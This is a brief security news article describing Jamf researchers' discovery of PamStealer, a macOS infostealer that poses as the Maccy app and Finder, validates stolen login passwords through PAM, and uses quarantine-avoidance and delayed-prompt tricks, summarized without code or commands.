New macOS Malware 'PamStealer' Uses Clever Techniques to Steal Passwords Stealthily
Researchers have discovered a novel macOS malware that combines multiple clever tactics to infect Macs and steal login passwords, staying hidden by masquerading as legitimate apps and delaying suspicious prompts.

Security firm Jamf researchers have discovered a new macOS malware named PamStealer. It is delivered in two stages. The first stage is a disk image masquerading as Maccy, a legitimate clipboard manager. The disk image contains an AppleScript that, when double-clicked, opens in Script Editor. The malicious code is buried deep within the file. Instead of using typical shell commands, the AppleScript uses JavaScript for Automation (JXA) to download the second stage via native Objective-C APIs. The second stage is written in Rust and is an infostealer. It uses the Pluggable Authentication Modules (PAM) interface built into macOS to locally validate the user's login password before sending it to an attacker-controlled server. PamStealer employs several stealth techniques. It bypasses the com.apple.quarantine attribute by prompting the user to press Command-R immediately after double-clicking, which executes the malicious code and avoids quarantine warnings. The second stage masquerades as legitimate system components like Finder or Software Update, using genuine Finder icons. It also encrypts command-and-control traffic and delays prompts like Full Disk Access requests for up to 40 minutes to avoid detection. This combination of techniques makes PamStealer quieter than typical macOS stealers. The malware shows how commodity macOS stealers are evolving to use native implementations and less detectable execution chains.


